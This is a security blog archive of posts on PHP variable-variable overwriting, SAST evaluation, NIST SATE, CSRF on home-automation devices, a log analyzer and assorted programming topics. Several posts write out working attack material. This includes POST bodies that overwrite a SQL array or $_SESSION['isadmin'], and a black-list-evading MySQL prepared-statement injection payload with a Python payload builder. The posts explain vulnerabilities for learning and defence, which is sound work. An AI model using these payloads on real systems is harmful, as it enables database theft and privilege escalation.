PHP, variable variables, oh my!
Romain | Tuesday, September 20 2011 - 18:50 UTC | Vulnerabilities
I was just looking at some PHP code for one of our clients, and found a case I haven't seen many times before. I thought I should share it here.
The code I was looking at looks like this:
<?php
// Init the PHP array with some SQL code to start the query
$declareSQLArray = InitializedArray('stuff');
// Use a strong enough validation routine to do the input
// validation of POST variables
while(list($name, $value) = each($_POST)) {
    if(!is_array($value))
        $$name = StrongValidation($value);
    else
        $$name = $value;
}
// Do something with my variables and always do a proper
// validation when I use the data
// Eventually, build my SQL command, and send this to the DB
$sql_command = join(' ', $declareSQLArray);
mysql_query($sql_command);
?>
The code, although horribly constructed, does not seem to show significant
weaknesses, apart from the usual case of submitting a POST variable as an array
to bypass StrongValidation. Even in that case, the value would have
failed every other validation routine in the code.
Even if you are experienced with PHP, you might not have encountered variable variables before. In short, they let you dynamically declare named variables. Here is a simple example:
hubert:~ Romain$ php -r '$name="foo"; $$name="Hello World!\n"; echo $foo;'
Hello World!
Here, the variable $foo gets declared, and assigned using PHP's
variable variables capabilities.
Getting back to our code example, I'm sure the reader will spot the issue,
and what an attacker can do to exploit such a scenario to trigger, in this case,
a SQL injection. Since the variable $declareSQLArray is defined
and initialized before the loop over the POST variables, it is possible to reassign it
using variable variables. No validation is performed when we
submit an array, and this is exactly what we want to do!
To exploit the SQL injection, you only need to submit POST variables to
overwrite the $declareSQLArray, and add the content that we want
in it!
POST /code_example.php HTTP/1.1
Host: example.com
...

declareSQLArray%5B%5D=SELECT...;&declareSQLArray%5B%5D=--&whatever...
Job done! The resulting SQL query will start with the payload that was
submitted as part of $declareSQLArray. You've got your SQL injection.
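To make the mechanics concrete, here is a small Python simulation of the same flaw. It is only a sketch under assumptions: a dictionary plays the role of PHP's variable scope, `parse_php_style` roughly mimics how PHP turns `name[]=value` pairs into arrays, and `strong_validation` is a hypothetical stand-in for StrongValidation. The initial SQL fragments are made up for the illustration.

```python
from urllib.parse import parse_qsl


def parse_php_style(body):
    """Group 'name[]=value' pairs into lists, roughly like PHP builds $_POST."""
    post = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key.endswith("[]"):
            post.setdefault(key[:-2], []).append(value)
        else:
            post[key] = value
    return post


def strong_validation(value):
    # Hypothetical stand-in for StrongValidation: keep alphanumerics only.
    return "".join(ch for ch in value if ch.isalnum())


def handle_request(body):
    # The "scope" dict stands in for PHP variables; this entry is $declareSQLArray.
    scope = {"declareSQLArray": ["SELECT", "name", "FROM", "items"]}
    for name, value in parse_php_style(body).items():
        # Equivalent of `$$name = ...`: arrays skip validation entirely.
        if isinstance(value, list):
            scope[name] = value
        else:
            scope[name] = strong_validation(value)
    # Equivalent of join(' ', $declareSQLArray)
    return " ".join(scope["declareSQLArray"])


if __name__ == "__main__":
    print(handle_request("comment=hello%27"))
    print(handle_request("declareSQLArray%5B%5D=SELECT+1%3B&declareSQLArray%5B%5D=--"))
```

The first request leaves the query untouched, while the second one replaces it with the attacker's fragments, because the array branch assigns the value without validating it.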
Update: While driving back home, I was wondering if I could overwrite values from the SESSION using this technique. A couple of lines of code and a POST request later, the short answer is: YES.
Imagine that you have an isadmin variable as part of the
session (which is an associative array). This variable would be set in
code like this:
if ($user->isNotAdmin())
    $_SESSION['isadmin'] = 0;
else
    $_SESSION['isadmin'] = 1;
Exploiting the previous weakness of the code example, we are able to
overwrite the $_SESSION['isadmin'] content, only by supplying what
will be interpreted as an associative array by PHP:
POST /code_example.php HTTP/1.1
Host: example.com
...

_SESSION%5Bisadmin%5D=1&whatever...
I'm sure you're thinking, as I am, that this is getting more interesting!
This issue is not new at all; it is known as Dynamic Variable Evaluation (thanks to Steve Christey).
The interesting part is that DAST won't be able to detect it (unless
you are lucky), and it is very hard for a SAST to deal with it
(actually, I doubt any SAST vendor that supports PHP handles this case, but it's
not impossible since they have all they need to solve the problem).
Update 2: Based on the comments, I did some testing and observed that even if we can overwrite data from the session, this data does not get persisted in the session. This means that you can still control a value from a super global for the remaining execution of the script, but cannot persist the data.
Romain | Wednesday, July 13 2011 - 22:29 UTC | Vulnerabilities
As part of the SQL injection challenges that I developed (focusing on MySQL), one of the classic challenges (we have the same type for XSS) is a simple black-list, which juniors nevertheless find disturbing, combined with a few controls such as partial output encoding.
In the case of SQLi, I decided to blacklist the following keywords (as seen during an assessment): select, union, drop, delete, insert, and, or, where, update, if, not
On top of this, I use the mysqli function that properly escapes strings (mysqli_real_escape_string), and I remove all white-spaces.
The SQL command is sent through a driver that supports multiple queries (i.e., you can stack queries), and the injection context is fairly simple; we have something like this: SELECT username FROM users WHERE userid=<<HERE>>
Since this is an *exploitation* challenge, the goal is to extract the password of a given user from this database.
Now, every time that I write a challenge, I first come up with the application and I need to break it after to make sure that there is a solution (unless the challenge is derived from what I found already in some of my previous assessments).
Anyway, here my main personal challenge was to come up with a query that would retrieve the proper data without using one of the black-listed keywords. Spaces and quotes are easy not to care about simply by using /**/ as a word separator, and we can use the hexadecimal representation of strings so that we make sure not to use single-quotes & co. Here is a quick summary with 2 similar queries:
The way I found to solve this challenge is to use MySQL prepared statements. However, I was fairly disturbed at first since I cannot use the following syntax in MySQL:
PREPARE st FROM 0x73656c656374202a2066726f6d207573657273; EXECUTE st; DEALLOCATE PREPARE st;
where 0x73656c656374202a2066726f6d207573657273 contains the query to get everything from the users table (i.e., select * from users). The PREPARE syntax is not as flexible as other string handling in MySQL, and does not accept a string given in its hexadecimal representation.
The gotcha here (I wouldn't call this a trick) is to use a temporary variable assignment, and use this variable in the PREPARE construct. The final construct I used is the following:
SET @v=0x73656c656374202a2066726f6d207573657273; PREPARE st FROM @v; EXECUTE st; DEALLOCATE PREPARE st;
Now, putting the pieces together and adding this to our original query, we get a payload like this:
9999||username=0xdeadbeef;SET/**/@s=0x73656c656374202a2066726f6d207573657273;PREPARE/**/ss/**/FROM/**/@s;EXECUTE/**/ss;DEALLOCATE/**/PREPARE/**/ss;#
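For readers who want to reproduce the construction, here is a minimal Python sketch that builds the payload above from a plain query. The helper names (`mysql_hex`, `build_payload`, `is_blocked`) are mine, and the black-list check assumes a simple case-insensitive substring match, which may differ from what the challenge actually does.

```python
# Keywords black-listed in the challenge, as listed earlier in the post.
BLACKLIST = ["select", "union", "drop", "delete", "insert", "and",
             "or", "where", "update", "if", "not"]


def mysql_hex(text):
    """Return the MySQL hexadecimal literal for an ASCII string."""
    return "0x" + text.encode("ascii").hex()


def build_payload(query, prefix="9999||username=0xdeadbeef"):
    """Wrap `query` in SET / PREPARE / EXECUTE and replace spaces with /**/."""
    statements = [
        prefix,
        "SET @s=" + mysql_hex(query),
        "PREPARE ss FROM @s",
        "EXECUTE ss",
        "DEALLOCATE PREPARE ss",
    ]
    return ";".join(statements).replace(" ", "/**/") + ";#"


def is_blocked(payload):
    # Assumption: the filter is a case-insensitive substring match.
    lowered = payload.lower()
    return any(keyword in lowered for keyword in BLACKLIST)


if __name__ == "__main__":
    payload = build_payload("select * from users")
    print(payload)
    print("blocked:", is_blocked(payload))
```

The point of the hex literal is that the black-listed words only exist inside the encoded string, so a keyword filter applied to the raw input never sees them.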
This construct is very similar to the solution of the challenge, but not exactly the same since we need to use the application to display the data. Therefore, in that case we need to make sure that the prepared statement will return only one column, etc.
Anyway, I wanted to share this since I haven't come across many references that talked about using prepared statements as SQL injection payloads...
I just dug that image out; I made it for the release of the WASC Threat Classification 2.0
Romain | Sunday, January 10 2010 - 11:10 UTC | Discussion
In reply to Dinis's blog post: The Need for Standards to evaluate Static Analysis Tools
1. You unfortunately list only a few types of SAST. Many tools don't implement taint analysis -- if you go into the Ada/C/C++ world, you won't see much taint-based analysis, but rather other technologies such as symbolic execution (Grammatech), abstract interpretation (ASTREE, PolySpace, etc.), and more. A list of SAST can be found on the NIST SAMATE website: List of Source Code Security Analyzers
2. As said on twitter, concerning the WASSEC, I don't believe it's important to have public evaluations of commercial/open-source tools. Also, WASSEC lists some vulnerabilities that a tool should look for, but we don't provide test cases, so it's nearly impossible to claim that a tool effectively tests for a given problem, e.g. the difference between two tools:
Depending on who you are and what you want, you might very well say that those two tools have the same support for XSS...
Moreover, tools are changing so quickly that an evaluation would only be accurate at the time you make it.
3. NIST SATE is literally an exposition. NIST chooses test cases (real open-source programs that cover different types of functionality and technologies) and asks tool makers to run their SAST on those programs. The goal isn't to compare the tools and claim that one is better than another for a given technology, but to see how tools (in general) perform, how many types of weaknesses they find, and how much the tool findings overlap (which turned out to be very little).
More generally, as Andrew said, a SAST isn't only an analysis engine that finds weaknesses in a program; it's a suite of functionalities:
Ultimately, every one of those elements is important and needs to be tested, but again, their importance depends on who you are and how you want to use the SAST (from a simple compliance type of scan to exhaustive security testing).
Just to tell you, NIST SAMATE (organizers of SATE) has been thinking a lot about those problems, and there is no easy solution for evaluating SAST... But the last SATE report explains some of the problems we (I was part of the SAMATE team at the time) faced: SATE 2008 - NIST Special Publication 500-279
I've been working on a data warehouse project lately, in Python, to support the different kinds of data analysis I am developing as part of my current work. I decided to use SQLAlchemy as the ORM; I can then quickly move from my development version, using an SQLite database, to production, using MySQL or MSSQL databases.
SQLAlchemy is also one of these amazing ORMs that support sharding -- needless to say, this is very important when you develop a tool that will import, format, process and analyze gigabytes of data.
Also, since I work with a lot of data types that I register into my ORM instance and persist into a database, I need my software to be able to quickly generate an object representing the data type: a particular instance of the object. Developers usually create factories in order to create instances of objects. The main idea is to delegate the instantiation of the object to a third-party object. In most factories, we specify the type of object that we want to create: Give me an instance of a pizza with mushrooms, tomatoes and ham.
Having to ask for a particular type (or sub-type) of object was the main limitation for my use. In fact, most of my types are related in some way, but without strong inheritance (Dish > Pie > Pizza); another important point is the maintainability of code in which I would list all the different types of objects my factory needs to create... Well, I wanted something more generic: a data driven factory.
The data driven factory is a factory that, based on the data sent to the factory object constructor, will produce an instance. A simple example would be getting an instance of a Margherita pizza when giving certain ingredients (tomatoes, mozzarella and parmesan), or a Neapolitan if I add anchovies.
This type of factory, which depends only on the data passed as parameters, is possible in Python thanks to the class inspection capabilities of the language. The implementation I propose requires you to register each class to be constructed in the factory; the constructor arguments (and default arguments) are analyzed at that point and used for matching later on. You then pass the "type" of each data field (basically, the argument names), and the factory gets the appropriate object for you.
Side note: The factory returns the class rather than an instance of the object for performance reasons. In fact, I get the class from the factory, store it, and loop through the instantiation with millions of records...
Example of use:
class Shape(object):
    pass

class Circle(Shape):
    def __init__(self, center, radius=RAD_MAX):
        ....

class DiskHole(Shape):
    def __init__(self, center, radius, small_radius=RAD_SMALL):
        ....

factory = DDFactory()
factory.register(Shape)
factory.register(Circle)
factory.register(DiskHole)
print factory.get(['center', 'radius']) #> return 'Circle' ctor
print factory.get(['center', 'radius', 'small_radius']) #> return 'DiskHole' ctor
You can access this factory here: dd_factory.py
In the distributed code, I assume that each object to create has a
__tablename__ class member that tells which database
table is the eventual target (which is my case, using SQLAlchemy declarative
objects). This is easy to change by replacing the factory's register method with
something like this:
def register(self, cls):
    if hasattr(cls, '__init__'):
        s_cls = str(cls)
        args, defaults_dict = DDFactory.defaults_values(cls)
        if s_cls not in self.registrar:
            self.registrar[s_cls] = {'class' : cls, 'args' : args, 'defaults' : defaults_dict}
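For readers who do not want to download the file, here is a minimal, self-contained sketch of the idea in Python 3. It is not the code from dd_factory.py: the class name `DataDrivenFactory`, the matching rule (all required arguments present, no unknown field, fewest unused defaults wins) and the constant values are assumptions made for the illustration.

```python
import inspect

RAD_MAX = 100.0   # hypothetical default values for the example
RAD_SMALL = 1.0


class Shape:
    pass


class Circle(Shape):
    def __init__(self, center, radius=RAD_MAX):
        self.center, self.radius = center, radius


class DiskHole(Shape):
    def __init__(self, center, radius, small_radius=RAD_SMALL):
        self.center, self.radius, self.small_radius = center, radius, small_radius


class DataDrivenFactory:
    def __init__(self):
        self.registrar = {}

    def register(self, cls):
        # Only classes that define their own constructor can be matched.
        if "__init__" not in vars(cls):
            return
        required, optional = set(), set()
        params = list(inspect.signature(cls.__init__).parameters.values())[1:]
        for param in params:
            if param.kind in (param.VAR_POSITIONAL, param.VAR_KEYWORD):
                continue  # *args / **kwargs carry no field names
            if param.default is inspect.Parameter.empty:
                required.add(param.name)
            else:
                optional.add(param.name)
        self.registrar[cls.__name__] = (cls, required, optional)

    def get(self, fields):
        """Return the best matching class (not an instance), or None."""
        fields = set(fields)
        best, best_unused = None, None
        for cls, required, optional in self.registrar.values():
            accepted = required | optional
            if required <= fields <= accepted:
                unused = len(accepted - fields)
                if best is None or unused < best_unused:
                    best, best_unused = cls, unused
        return best


factory = DataDrivenFactory()
for shape_class in (Shape, Circle, DiskHole):
    factory.register(shape_class)

if __name__ == "__main__":
    print(factory.get(["center", "radius"]))
    print(factory.get(["center", "radius", "small_radius"]))
```

Since `get` returns the class, the caller can look it up once and then instantiate it in a tight loop, which is the performance point made in the side note above.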
Romain | Tuesday, June 30 2009 - 11:30 UTC | Information
The NIST SAMATE project conducted the first Static Analysis Tool
Exposition (SATE) in 2008 to advance research in static analysis tools that
find security defects in source code. The main goals of SATE were to enable
empirical research based on large test sets and to encourage improvement and
speed adoption of tools. The exposition was planned to be an annual
event.
SATE 2008 was one of my last projects at NIST. I really enjoyed working on this project from the beginning; it was challenging, especially because we had to create so many artifacts to make the tools report weaknesses the same way, integrate them all together, and provide ways for assessors to make meaningful reviews.
In a nutshell, we selected 6 different open-source programs (3 in C, 3 in Java) and had tool vendors run their tools on these test cases. Tool vendors were allowed to customize their tool if it provided such a capability. Fortify was the only vendor who created a custom rule (to help the tool with a validation routine for MVNForum). Our goal was then to combine all the results and analyze them to provide information on the correctness of the tools.
If you are interested, you can download the SATE data and the NIST SATE Special Publication.
Thanks to all the SAMATE team for this effort, and especially Vadim Okun and Paul E. Black.
For more information, you can reach the SATE page at NIST.
Firefox 3.1beta has been released today, with support for two HTML 5 elements: audio and video.
Gareth and I exchanged some messages on twitter+ about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers.
These are pretty incomplete documents, so I decided to create a mapping between the current WhatWG document and the browsers' support. This is possible because the current document reports the implementation status of the different items.
Anyway, here is a table I assembled, containing the latest information about the HTML5 implementations in the current browser engines.
I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate in, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started on Script Mapping again this summer...
EDIT: I will maintain the current list of HTML5 implementation in current browsers: HTML5. March 30.
+ twitter is quite cool to follow/interact, feel free to follow me at @rgaucher
Romain | Saturday, February 21 2009 - 15:11 UTC | Information
Fortify just posted a nice blog post about the audit they did on several reference implementations that are competing to become the next NIST SHA-3.
They do not release much information on their findings: only one is described. I would have really liked to see how powerful the analysis was (if it was) in finding these problems.
It would also be nice to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc., do the same, and then start another competition ;)
I'd really like to emphasize the conclusions of Fortify's blog post:
Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two seperate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used.
The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation.
Some time ago, I was amazed by the difficulty of a CAPTCHA implemented by rapidshare. Well, today I came across one which is even worse. We all know that using a CAPTCHA is very bad from a usability point of view, but without them, spammers would easily add junk to your database. But it's even worse when the CAPTCHA software is not working properly...

Sure you won't get any spammers here... nor regular users.
Just to avoid confusion or misinterpretation, even if you refresh/clear cache/etc. you will get this message. And no, 'ERROR' is not the solution of the CAPTCHA. Hope that phishtank will fix that soon...
We see many different CAPTCHAs on the web; some are good, some are not. I do not know why people keep developing their own simplistic CAPTCHA when there are good services like the one provided by reCAPTCHA. This CAPTCHA is pretty solid and also offers an audio version (way better for accessibility).
Hello Romain,
The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIA’s National Clandestine Service seeks qualified applicants to serve our country’s mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge?
All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force.
For more information and to apply, visit: www.cia.gov
You can make a world of difference.
Come on guys, I'm not even a US citizen... So yeah, the CIA is looking for security guys by spamming LinkedIn groups. Anything wrong with that process?
Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (wall of shame of SSL certificates?)
So now, Google & co, fix your certificates :P
Romain | Tuesday, December 9 2008 - 14:05 UTC | Vulnerabilities
Today, a friend of mine was really proud to show me the Home Automation installation he just bought. Well, since he lives in France and I am in DC, he showed me the web interface that controls the lights etc. in his house. As he wanted to test this domotic system, he only plugged his Christmas tree lights into the system.
Well, maybe I'm only seeing bad stuff around me, but... Déformation professionnelle we'll say! It was so easy to make the lights blink with a simple script that I showed it to him. So, every 5 seconds, it would change the state.
Anyway, this CSRF is not a big deal for him since it's only the Christmas tree lights, it's only a temporary installation and well, it's fun. But after a simple Google search, I found another site like my friend's. The URL that Google returns is:
http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON
Which is basically turning on some device... :)
Also, not only does this application have tons of CSRF, it also has a nice stored XSS which lets you do whatever you want with it! And btw, since the Google robot reported this, it means that every time it crawls the website (or at least reaches that particular URL), it will turn the device ON :)
Web security enters your house, f34rs!
Romain | Friday, December 5 2008 - 10:45 UTC
It's been such a long time since I last posted here. I've been quite busy with the new job at Cigital and all that it implies.
Anyway, this morning, a colleague of mine showed me a piece of JavaScript he used to create a request to another website (actually, this was just to do in JavaScript what I previously did in Python). This totally bugged me. He was able to craft a request (using XHR) from a local file to a remote website... WTF with SOP? After some tests, it seems it only works with IE7, but I didn't test many browsers: only Firefox 3, Chrome, and IE7.
So, I have no idea if this is known for a long time or not, but well, I haven't seen this before.
A simple POC is available here: xhr_SOP_ie7.html
Romain | Thursday, September 25 2008 - 09:01 UTC | Information
I know how tough and crucial it is to get participants for a survey, so it would be great if you guys could take this one and spread it a little bit more...
Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values.
The URL is: http://theprivacyplace.org/currentsurvey
We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/).
Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina
On behalf of the research staff at ThePrivacyPlace.Org, thank you!
All good things come to an end... it is time for me to leave NIST. I will be a security consultant at Cigital, Inc.
I've been working at NIST for two and a half years as a Guest Researcher in the SAMATE Project. I originally came to NIST to do mostly statistical analysis, but it changed a lot! I started by building the SAMATE Reference Dataset website, and this is how I started to learn about "security", by working with flawed source code. This was very obscure to me (I guess like for every computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners, etc.
My first real security-related work was on the Web Application Security Scanner Specification and then designing a way of testing web application scanners:
The goal of the 3 components based analysis is to really be able to understand what the tool is doing, if it didn't find a particular vulnerability, why?
One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was one of the organizers and from the beginning, it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect and we made many mistakes, but at least we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging in many respects:
Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff, and I'm really looking forward to seeing the results of the current study we are running on the function-wise weakness characterization.
But for now, it's time for me to get some vacation, going back to France for almost one month, getting my worker visa etc.
Some time ago, I released a first version of a tool named Scalp. The tool analyzes Apache HTTPD logs to look for attacks. The attack detection is based on the rules provided by the PHP-IDS project.
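To give an idea of the approach, here is a minimal Python sketch of rule-based log scanning. It is not Scalp's code: the three rules below are simplified, hypothetical patterns (the real PHP-IDS filter set is much larger and more precise), and the parser only looks at the request URL of each access log line.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical rules, far simpler than the real PHP-IDS filters.
RULES = [
    ("xss", re.compile(r"<script|javascript:", re.IGNORECASE)),
    ("sqli", re.compile(r"union\s+select|'\s*or\s+1=1", re.IGNORECASE)),
    ("traversal", re.compile(r"\.\./")),
]

# Request part of an Apache access log line: "METHOD URL PROTOCOL"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')


def scan_line(line):
    """Return the names of the rules matched by the request URL of a log line."""
    match = REQUEST_RE.search(line)
    if match is None:
        return []
    url = unquote_plus(match.group("url"))  # decode %xx and '+' before matching
    return [name for name, rule in RULES if rule.search(url)]


if __name__ == "__main__":
    sample = ('127.0.0.1 - - [10/Oct/2008:13:55:36 -0700] '
              '"GET /index.php?id=1+UNION+SELECT+1 HTTP/1.1" 200 2326')
    print(scan_line(sample))
```

Decoding the URL before applying the rules matters, since attack strings in logs are usually percent-encoded.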
Today, I took the time to further finalize the Python version of Scalp. Version 0.4 can now be downloaded from the project web page.
This version includes a couple of features such as:
And then, with some other options that already existed in the previous versions,
the tool seems to approach a final version.
I won't add more to it since I want to keep it simple and quite fast (I may add optimizations if I find some). Also, the C++ version is on its way and mostly done with the same set of options; the code can be checked out from the Google repository, but I still have to work on the options and the time-frame specification.
Scalp 0.4:
For those who don't know Qt, it is a huge and mature framework for developing GUIs and more on different platforms (read: multi-platform). I have already done some development using Qt and C++ (especially when I was working at the GERAD).
Since Marcin and I wanted to have a look at some technologies that involve a browser, I decided to look at Qt and its almost-fresh WebKit integration.
The integration of WebKit in a framework like Qt allows developers to embed in their applications, supposedly in an easy manner, a browser that supports the basic web technologies, namely HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write one's own plugin in order to interact with some specific content).
And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I already know Python and Qt, it was easy for me to start and be kinda effective. So, after a few hours of work, documentation reading, and trying to understand why and how the Python version of Qt does things differently from the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, viewing the source, and a simple encoding converter (click on the image to see the full screen-shot):
At this point, I was actually very excited: less than 500 lines of Python to create that... It seemed worth a few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test.
My next logical step was to extend the current tool in order to have tamper-data-like capabilities (e.g., being able to intercept the HTTP request and then tamper with the GET/POST data).
And here come the problems... it's apparently not possible to get the current request and then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to override the POST/GET requests, since this object is used to set the proxies etc., but nothing... I think they just didn't open up this possibility for some reason.
Oh well, I then stopped developing this prototype and will try to contact Qt experts/developers to figure out if there is another way to do it. I thought of a solution, which would be to have my own HTTP manager using QHttp to do the request, get the response, etc. and then send the content to the browser; this would be great in a web application scanner, but for the use I had in mind, it would create huge limitations for user interaction, especially with Ajax applications. So, the prototype stays as it is until I find a solution or Qt opens up their network management under the QWebView widget...
Fixed:
An update to let you know that I actually fixed the problem. It was really stupid of me: I should really check whether a method is virtual or not before overriding it :/ shame on me!
So now, I am able to have a firefox/tamper-data/firebug in one tool :)
Romain | Thursday, September 4 2008 - 12:15 UTC | Discussion
This is the question that is coming to my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but I'm just wondering how it is possible for the brand-new-shiny-buggy browser to be ranked that well in a "classical" manner.
Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First off, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc.
Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is no business-like interference in the process...
People have started thinking about how to prevent spam when they're building websites; that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page...
For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address:
<script type="text/javascript">
//<![CDATA[
document.write('<a href="mailto:XXXX@qik.com"\
title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>
As the readers of this blog may know, the bot process is really easy: download the HTML page (crawling) and then try to extract the email addresses (parsing). It is obvious that a bot wouldn't care about the CDATA section or the fact that the address is embedded in JavaScript code. If I had to write a bot, I would use very loose parsing in order to gather as much information as possible, and I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you that if this were a URL, the Google bots would get it...
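As an illustration of how little such a bot needs, here is a minimal Python sketch of a context-free harvester. The regular expression is a deliberately loose assumption, not a complete email grammar, and the page content is the snippet shown above (joined on one line).

```python
import re

# Loose pattern: good enough for harvesting, not a full email grammar.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

PAGE = r"""<script type="text/javascript">
//<![CDATA[
document.write('<a href="mailto:XXXX@qik.com" title="Send us an email!">XXXX@qik.com<\/a>');
//]]>
</script>"""


def harvest(html):
    """Return the unique addresses found anywhere in the page, ignoring context."""
    return sorted(set(EMAIL_RE.findall(html)))


if __name__ == "__main__":
    print(harvest(PAGE))
```

The harvester never parses HTML or JavaScript; it scans the raw bytes, so wrapping the address in document.write or CDATA changes nothing.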
So please, obfuscate this just a bit... some examples can be found on fuckthespam.com
Romain | Sunday, August 10 2008 - 15:20 UTC | Discussion
When I first learned about source code metrics, I was amazed that people used lines of code to compare software. To me, it showed a lack of imagination.
At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore, I have to extract a couple of metrics for each function:
At first, lines of code was implemented because it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of "sources/sinks" for studying input validation weaknesses later on...
Anyway, after running some statistics on the results, I was amazed to observe that the Pearson correlation coefficient between McCabe and Lines of Code was never less than 0.90 (which can be read as a 90% correlation rate) (but I have to say that there are huge limitations in the parsers we are using for extracting information; for instance, the C is not pre-processed, etc.). This result is only valid for the C test cases; the average observed correlation in the Java test cases is around 0.60...
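For reference, the coefficient in question can be computed with a few lines of Python. This is only a sketch of the standard formula; the per-function values in the example are made up for illustration and are not taken from the SATE data.

```python
from math import sqrt


def pearson(xs, ys):
    """Pearson correlation coefficient of two equally long sequences."""
    n = len(xs)
    if n != len(ys) or n < 2:
        raise ValueError("need two sequences of the same length (>= 2)")
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    covariance = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var_x = sum((x - mean_x) ** 2 for x in xs)
    var_y = sum((y - mean_y) ** 2 for y in ys)
    # Raises ZeroDivisionError if one of the sequences is constant.
    return covariance / sqrt(var_x * var_y)


if __name__ == "__main__":
    # Toy, made-up per-function values (not from the experiment).
    lines_of_code = [10, 25, 40, 80]
    mccabe = [2, 5, 7, 15]
    print(round(pearson(lines_of_code, mccabe), 3))
```

A value close to 1 means the two metrics grow together almost linearly, which is what the C test cases suggested.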
Of course further statistical analysis will be necessary to conclude anything on this subject, but if we were unlucky with the test cases selection, this may have been a source of the problem, but I don't think we were. Actually, this seems quite logical to think that these metrics a related, the longer the code is, the more complex in term of tests, loops etc. it can be, there is indeed more chance that a longer code contains more cycles :)
Oh well, I'll keep writing about this, especially since I expect to get results pretty soon...
While working on the C++ version of scalp, I had to do massive simple transformations of a given text, i.e. replacing words with others.
Since the obvious way to do this (a loop that does one replacement at a time) is very inefficient, I decided to find something faster. I came up with a tree-based replacement algorithm; I believe this is kinda well known, but I had never heard of such an algorithm. It basically uses a non-compact trie in order to search efficiently for the current word.
The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to replace the words "ba", "me" and "mp" in a text, the trie will be the following one:

The idea is then to iterate over all the characters in the text and, for each letter, determine whether it can start a word to replace (simply by checking whether the letter is a child of the trie root). Then, we iterate over the next letters in the text to see whether the sequence of letters is an actual word to replace (each time, the same method is used: look in the children of the current state of our iterator in the trie).
This algorithm seems more efficient than the simple replace used in a loop, since we perform a descent in a tree and therefore replace a linear search with a logarithmic one.
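The descent described above can be sketched in a few lines of Python. This is an illustration rather than the C++ code from scalp: the nested dictionaries, the function names and the "longest match wins" rule are my own assumptions, and the replacement strings are arbitrary.

```python
def build_trie(replacements):
    """Build a non-compact trie: one dict node per character.

    The key None marks the end of a word and stores its replacement.
    """
    root = {}
    for word, by in replacements.items():
        if not word:
            raise ValueError("cannot replace the empty string")
        node = root
        for ch in word:
            node = node.setdefault(ch, {})
        node[None] = by
    return root

def trie_replace(text, root):
    """Replace dictionary words in one left-to-right pass (longest match wins)."""
    out = []
    i = 0
    while i < len(text):
        node = root
        j = i
        match_end = None
        match_by = None
        # Descend in the trie as long as the next characters are children.
        while j < len(text) and text[j] in node:
            node = node[text[j]]
            j += 1
            if None in node:
                match_end, match_by = j, node[None]
        if match_end is None:
            out.append(text[i])   # no word starts here: copy the character
            i += 1
        else:
            out.append(match_by)  # emit the replacement and skip the word
            i = match_end
    return "".join(out)

# The three words of the example above, with made-up replacements.
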